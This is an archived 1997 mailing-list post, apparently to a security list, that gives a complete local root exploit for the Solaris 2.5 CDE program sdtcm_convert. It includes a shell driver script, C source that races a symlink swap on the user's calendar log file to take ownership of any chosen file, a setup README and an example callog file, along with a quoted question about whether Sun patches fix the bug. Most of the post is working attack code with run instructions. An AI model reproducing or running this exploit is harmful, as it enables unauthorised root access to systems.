[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Exploit for sdtcm_convert - Solaris 2.5 - second
Sun Feb 23 10:36:58 EET 1997 Romania
"Exploit for sdtcm_convert - Solaris 2.5"
I send you an e-mail about a bug and an exploit for sdtcm_convert.
(sdtcm_convert allows you to become owner of any file or directory from
the system - and gain root access )
First, there was some problems with my uuencoded exploit (some damaged it
on the route...) so i'll resend you the files for exploit.
Second, Casper Dick send me:
>Is this the bug fixed in the Sun patches:
>103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
>103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
>103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86
version)
>103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86
version)
>or is it a new one?
>Casper
I cant found this patches to verify if that fix the problem i have
found or not. Anyway you have an exploit ! (execute 'thefist' and wait)
Cristian Schipor - Computer Science Faculty - Bucharest - Romania
Email: [email protected] [email protected] [email protected]
Phone: (401) 410.60.88
------------------------- file thefirst ------------------------------------
/bin/echo "orange.c -> orange"
gcc -o orange orange.c
/usr/ucb/whoami > wh
read USER < ./wh
#watching for callog file if it isnt will stop
if ! test -f /var/spool/calendar/callog.$USER; then
/bin/echo "I cant found callog file. Please read README and create it"
exit;
fi
/bin/echo "what's the target ???"
read TARGET
/bin/echo /bin/chmod 000 /var/spool/calendar/callog.$USER >lemon
/bin/echo /usr/dt/bin/sdtcm_convert $USER >>lemon
/bin/chmod 700 ./lemon
./orange $TARGET $USER
------------------------- end --------------------------
------------------------ file orange.c ---------------------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#define path "/var/spool/calendar/callog."
void main(int argc, char *argv[])
{
int pid,filedes[2];
FILE *f;
struct stat info;
long i;
char target[128],shift[128];
strcpy(target,argv[1]);
strcpy(shift,path);
strcat(shift,argv[2]);
if(pipe(filedes))
{
perror("cant crate pipe\n");
exit(0);
}
if(pid=fork()==0)
{
for(i=0;i<30000000;i++);
unlink(shift);
symlink(target,shift);
write(filedes[1],"y\n",sizeof("y\n"));
}
else
{
close(0);
dup(filedes[0]);
system("lemon");
stat(target,&info);
if(info.st_uid==getuid()) printf("COLL I did IT !!!\n");
}
}
------------------------ end ----------------------------
------------------------ file README ----------------------
*How to make a simple callog file*
If you dont have a /var/spool/calendar/callog.YOU edit callog.example,
replace 'skipo' with your user name and 'sundy.cs.pub.ro' with your
machine name (try first the short name, example: sundy and if you'll have
troubleshotings try the long name, example sundy.cs.pub.ro). After that
copy the new callog file in /var/spool/calendar/callog.YOUR_USER_NAME, run
once sdtcm_convert with your user name (example sdtcm_convert skipo)
and wait for corrections. Now you are ready to run the exploit.
Another way is to run calendar tool from CDE.
------------------------- end -------------------------------
------------------------ file callog.example ------------------------
Version: 4
**** start of log on Fri Dec 6 14:07:43 1996 ****
(calendarattributes ("-//XAPIA/CSA/CALATTR//NONSGML Access List//EN","10:access_list","world:2")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN","5:string","[email protected]")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN","6:user","[email protected]")
("-//XAPIA/CSA/CALATTR//NONSGML Character Set//EN","5:string","C.ISO-8859-1")
("-//XAPIA/CSA/CALATTR//NONSGML Date Created//EN","7:date_time","19961206T120743Z")
("-//XAPIA/CSA/CALATTR//NONSGML Product Identifier//EN","5:string","-//DT//NONSGML Calendar Product Version 1//EN")
("-//XAPIA/CSA/CALATTR//NONSGML Version//EN","5:string","-//XAPIA/CSA/VERSION1/NONSGML CSA Version 1//EN")
)
-------------------------- end --------------------------------